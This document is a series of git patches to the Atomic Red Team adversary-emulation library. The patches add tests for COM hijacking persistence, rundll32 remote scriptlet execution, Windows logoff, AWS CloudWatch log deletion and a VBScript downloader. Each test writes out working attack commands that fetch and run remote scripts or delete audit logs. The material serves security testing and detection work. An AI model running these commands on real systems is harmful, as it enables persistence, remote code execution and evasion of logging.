+- [Atomic Test #4 - COM hijacking via TreatAs](#atomic-test-4---com-hijacking-via-treatas) +
@@ -162,4 +164,61 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato +
+
+ +## Atomic Test #4 - COM hijacking via TreatAs +This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute. +Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The +test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out. + +References: + +https://youtu.be/3gz1QmiMhss?t=1251 + +https://github.com/enigma0x3/windows-operating-system-archaeology + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 33eacead-f117-4863-8eb0-5c6304fbfaa9 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f + +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f +reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f + +rundll32.exe -sta "AtomicTest" +``` + +#### Cleanup Commands: +```powershell +reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f +reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f +reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f +``` + + + + +
From f6b385f8602e8c7a8d8507546e3d91a6624a1993 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Fri, 29 Jul 2022 17:13:53 +0200 Subject: [PATCH 07/22] Update T1529.yaml (#2055) * Update T1529.yaml * add malware example to description Co-authored-by: Carrie Roberts --- atomics/T1529/T1529.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/atomics/T1529/T1529.yaml b/atomics/T1529/T1529.yaml index bfbf82be..de248b1b 100644 --- a/atomics/T1529/T1529.yaml +++ b/atomics/T1529/T1529.yaml @@ -123,3 +123,19 @@ atomic_tests: poweroff --reboot name: bash elevation_required: true +- name: Logoff System - Windows + auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 + description: | + This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor) + supported_platforms: + - windows + input_arguments: + timeout: + description: Timeout period before shutdown (seconds) + type: Integer + default: 1 + executor: + command: | + shutdown /l /t #{timeout} + name: command_prompt + elevation_required: true From 5849c1516b46f806d372bddc47c2e16f085a5ac2 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Fri, 29 Jul 2022 15:14:16 +0000 Subject: [PATCH 08/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 448eadfb..e27e592f 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1098,3 +1098,4 @@ ae9b2e3e-efa1-4483-86e2-fae529ab9fb6 a27418de-bdce-4ebd-b655-38f11142bf0c 1e40bb1d-195e-401e-a86b-c192f55e005c 33eacead-f117-4863-8eb0-5c6304fbfaa9 +3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 From 6f92864b889f60df38b2a7208d2d1dd96ccb59bc Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 29 Jul 2022 15:14:22 +0000 Subject: [PATCH 09/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 19 ++++++++++ atomics/T1529/T1529.md | 35 +++++++++++++++++++ 6 files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 060e2d4e..4e6c0b83 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1290,6 +1290,7 @@ impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70a impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash +impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index ec7db3cd..7160dbb3 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -931,6 +931,7 @@ impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1 impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt +impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index abe3650f..9c728cb9 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -2216,6 +2216,7 @@ - Atomic Test #7: Reboot System via `halt` - Linux [linux] - Atomic Test #8: Shutdown System via `poweroff` - Linux [linux] - Atomic Test #9: Reboot System via `poweroff` - Linux [linux] + - Atomic Test #10: Logoff System - Windows [windows] # initial-access - [T1133 External Remote Services](../../T1133/T1133.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 32fec16c..79c3f983 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1583,6 +1583,7 @@ - [T1529 System Shutdown/Reboot](../../T1529/T1529.md) - Atomic Test #1: Shutdown System - Windows [windows] - Atomic Test #2: Restart System - Windows [windows] + - Atomic Test #10: Logoff System - Windows [windows] # initial-access - [T1133 External Remote Services](../../T1133/T1133.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index d9b81102..79a3ad66 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -96626,6 +96626,25 @@ impact: ' name: bash elevation_required: true + - name: Logoff System - Windows + auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 + description: 'This test performs a Windows system logoff as seen in [dcrat backdoor + capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor) + + ' + supported_platforms: + - windows + input_arguments: + timeout: + description: Timeout period before shutdown (seconds) + type: Integer + default: 1 + executor: + command: 'shutdown /l /t #{timeout} + + ' + name: command_prompt + elevation_required: true initial-access: T1133: technique: diff --git a/atomics/T1529/T1529.md b/atomics/T1529/T1529.md index 7ea68bd4..08bebfec 100644 --- a/atomics/T1529/T1529.md +++ b/atomics/T1529/T1529.md @@ -24,6 +24,8 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other - [Atomic Test #9 - Reboot System via `poweroff` - Linux](#atomic-test-9---reboot-system-via-poweroff---linux) +- [Atomic Test #10 - Logoff System - Windows](#atomic-test-10---logoff-system---windows) +
@@ -296,4 +298,37 @@ poweroff --reboot +
+
+ +## Atomic Test #10 - Logoff System - Windows +This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor) + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 + + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| timeout | Timeout period before shutdown (seconds) | Integer | 1| + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +shutdown /l /t #{timeout} +``` + + + + + +
From e712150c213ff8925499e91a299ac27b45ee98e1 Mon Sep 17 00:00:00 2001 From: lucasRiley <70220074+lucasRiley@users.noreply.github.com> Date: Fri, 29 Jul 2022 17:31:23 -0500 Subject: [PATCH 10/22] T1218.011 Improvement (#2058) Co-authored-by: Riley Co-authored-by: Carrie Roberts --- atomics/T1218.011/T1218.011.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index c8f9f654..698a9a70 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -2,7 +2,6 @@ attack_technique: T1218.011 display_name: 'Signed Binary Proxy Execution: Rundll32' atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be description: | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. supported_platforms: @@ -14,7 +13,9 @@ atomic_tests: default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: command: | - rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + cleanup_command: | + taskkill /IM notepad.exe /f name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb From 023e149ac5f517412f4eb249e7f90c7ad0399254 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Fri, 29 Jul 2022 22:31:53 +0000 Subject: [PATCH 11/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1218.011/T1218.011.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1218.011/T1218.011.yaml b/atomics/T1218.011/T1218.011.yaml index 698a9a70..6e158223 100644 --- a/atomics/T1218.011/T1218.011.yaml +++ b/atomics/T1218.011/T1218.011.yaml @@ -2,6 +2,7 @@ attack_technique: T1218.011 display_name: 'Signed Binary Proxy Execution: Rundll32' atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject + auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d description: | Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e27e592f..1235e5f5 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1099,3 +1099,4 @@ a27418de-bdce-4ebd-b655-38f11142bf0c 1e40bb1d-195e-401e-a86b-c192f55e005c 33eacead-f117-4863-8eb0-5c6304fbfaa9 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 +57ba4ce9-ee7a-4f27-9928-3c70c489b59d From 3a5209a4fc49c847f3b47f2820717cbef98ae403 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 29 Jul 2022 22:32:00 +0000 Subject: [PATCH 12/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/index.yaml | 8 ++++++-- atomics/T1218.011/T1218.011.md | 8 ++++++-- 4 files changed, 14 insertions(+), 6 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 4e6c0b83..0f140af2 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1,5 +1,5 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt +defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 7160dbb3..9748317b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1,5 +1,5 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name -defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt +defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 79a3ad66..a944ce29 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -240,7 +240,7 @@ defense-evasion: identifier: T1218.011 atomic_tests: - name: Rundll32 execute JavaScript Remote Payload With GetObject - auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. @@ -253,7 +253,11 @@ defense-evasion: type: Url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct executor: - command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); + command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication + ";document.write();GetObject("script:#{file_url}").Exec(); + + ' + cleanup_command: 'taskkill /IM notepad.exe /f ' name: command_prompt diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 8bc8b5c9..de88a8c0 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe **Supported Platforms:** Windows -**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be +**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d @@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe ```cmd -rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); +start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` +#### Cleanup Commands: +```cmd +taskkill /IM notepad.exe /f +``` From 7ac7517321d44a3715580e7d0ddb28b124d10e13 Mon Sep 17 00:00:00 2001 From: gowthamarajr Date: Sat, 30 Jul 2022 17:18:08 -0400 Subject: [PATCH 13/22] Update T1562.008 Update T1562.008 by adding AWS CloudWatch Log Group Deletes & AWS CloudWatch Log Stream Deletes --- atomics/T1562.008/T1562.008.yaml | 67 +++++++++++++++++++++++++++++++- 1 file changed, 66 insertions(+), 1 deletion(-) diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 5734d5bc..3c17aa43 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -127,7 +127,6 @@ atomic_tests: Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True name: powershell elevation_required: false - - name: Disable CloudTrail Logging Through Event Selectors via Stratus auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c description: | @@ -181,3 +180,69 @@ atomic_tests: ./stratus cleanup --all name: sh elevation_required: false +- name: AWS CloudWatch Log Group Deletes + auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121 + description: | + Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by + deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: "log-test" + region: + description: Name of the region + type: String + default: "us-east-1" + dependencies: + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure + executor: + command: | + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + cleanup_command: + name: sh + elevation_required: false +- name: AWS CloudWatch Log Stream Deletes + auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932 + description: | + Creates a new cloudWatch log stream in AWS, Upon successful creation it will Delete the stream. Attackers can use this technique to evade defenses by + deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html + supported_platforms: + - iaas:aws + input_arguments: + cloudwatch_log_group_name: + description: Name of the cloudWatch log group + type: String + default: "test-logs" + cloudwatch_log_stream_name: + description: Name of the cloudWatch log stream + type: String + default: "20150601" + region: + description: Name of the region + type: String + default: "us-west-2" + dependencies: + - description: | + Check if ~/.aws/credentials file has a default stanza is configured + prereq_command: | + cat ~/.aws/credentials | grep "default" + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + get_prereq_command: | + echo Please install the aws-cli and configure your AWS defult profile using: aws configure + executor: + command: | + aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + cleanup_command: + name: sh + elevation_required: false \ No newline at end of file From b33bcb6cd4cbb3159ed871dbf810222561b39f7b Mon Sep 17 00:00:00 2001 From: gowthamarajr Date: Sat, 30 Jul 2022 17:28:51 -0400 Subject: [PATCH 14/22] Update T1562.008 --- atomics/T1562.008/T1562.008.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 3c17aa43..03e5b4b9 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -201,11 +201,11 @@ atomic_tests: Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | cat ~/.aws/credentials | grep "default" - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json get_prereq_command: | echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json cleanup_command: name: sh @@ -235,12 +235,12 @@ atomic_tests: Check if ~/.aws/credentials file has a default stanza is configured prereq_command: | cat ~/.aws/credentials | grep "default" - aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json - aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} get_prereq_command: | echo Please install the aws-cli and configure your AWS defult profile using: aws configure executor: command: | + aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json cleanup_command: From 614a715da87f550cedcfd6480a6913971788f81e Mon Sep 17 00:00:00 2001 From: gowthamarajr Date: Sat, 30 Jul 2022 17:37:06 -0400 Subject: [PATCH 15/22] Update 1562.008.yml --- atomics/T1562.008/T1562.008.yaml | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/atomics/T1562.008/T1562.008.yaml b/atomics/T1562.008/T1562.008.yaml index 03e5b4b9..b40317e7 100644 --- a/atomics/T1562.008/T1562.008.yaml +++ b/atomics/T1562.008/T1562.008.yaml @@ -206,7 +206,9 @@ atomic_tests: executor: command: | aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" cleanup_command: name: sh elevation_required: false @@ -240,9 +242,13 @@ atomic_tests: executor: command: | aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Created ***" aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Created ***" aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} + echo "*** Log Stream Deleted ***" aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json + echo "*** Log Group Deleted ***" cleanup_command: name: sh elevation_required: false \ No newline at end of file From 4ab943e73b937bace568227a3faacf16d386be65 Mon Sep 17 00:00:00 2001 From: Panos Moullotos <25383165+moullos@users.noreply.github.com> Date: Mon, 1 Aug 2022 19:51:46 +0300 Subject: [PATCH 16/22] New T1105 test based on open issue (#2060) * Create T1105-download-file.vbs * Added 2 tests to T1105 based on open issue * Update T1105.yaml * remove duplicate Co-authored-by: Carrie Roberts --- atomics/T1105/T1105.yaml | 15 ++++++++++++++- atomics/T1105/src/T1105-download-file.vbs | 10 ++++++++++ 2 files changed, 24 insertions(+), 1 deletion(-) create mode 100644 atomics/T1105/src/T1105-download-file.vbs diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index b49dd3c9..5a7f3390 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -700,4 +700,17 @@ atomic_tests: command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}' cleanup_command: 'del #{local_path} >nul 2>&1' name: command_prompt - + +- name: Download a file using wscript + description: Use wscript to run a local VisualBasic file to download a remote file + supported_platforms: + - windows + input_arguments: + vbscript_file: + description: Full path to the VisualBasic downloading the file + type: String + default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs + executor: + command: 'wscript.exe #{vbscript_file}' + cleanup_command: del Atomic-License.txt >nul 2>&1 + name: command_prompt diff --git a/atomics/T1105/src/T1105-download-file.vbs b/atomics/T1105/src/T1105-download-file.vbs new file mode 100644 index 00000000..2720a6e9 --- /dev/null +++ b/atomics/T1105/src/T1105-download-file.vbs @@ -0,0 +1,10 @@ +Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1") +URL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" +objWinHttp.open "GET", URL, False +objWinHttp.send "" +Dim BinaryStream +Set BinaryStream = CreateObject("ADODB.Stream") +BinaryStream.Type = 1 +BinaryStream.Open +BinaryStream.Write objWinHttp.responseBody +BinaryStream.SaveToFile "Atomic-License.txt", 2 From e3b3dc6c036be6db7cd829cc9a331e8d921dc8b2 Mon Sep 17 00:00:00 2001 From: Atomic Red Team GUID generator Date: Mon, 1 Aug 2022 16:52:17 +0000 Subject: [PATCH 17/22] Generate GUIDs from job=generate-docs branch=master [skip ci] --- atomics/T1105/T1105.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 5a7f3390..09356531 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml @@ -702,6 +702,7 @@ atomic_tests: name: command_prompt - name: Download a file using wscript + auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188 description: Use wscript to run a local VisualBasic file to download a remote file supported_platforms: - windows diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 1235e5f5..03b61cda 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -1100,3 +1100,4 @@ a27418de-bdce-4ebd-b655-38f11142bf0c 33eacead-f117-4863-8eb0-5c6304fbfaa9 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4 57ba4ce9-ee7a-4f27-9928-3c70c489b59d +97116a3f-efac-4b26-8336-b9cb18c45188 From 4e0637e706f4b2b3cc9d9903704341edc8e54103 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 1 Aug 2022 16:52:24 +0000 Subject: [PATCH 18/22] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 15 +++++++ atomics/T1105/T1105.md | 39 +++++++++++++++++++ 6 files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv 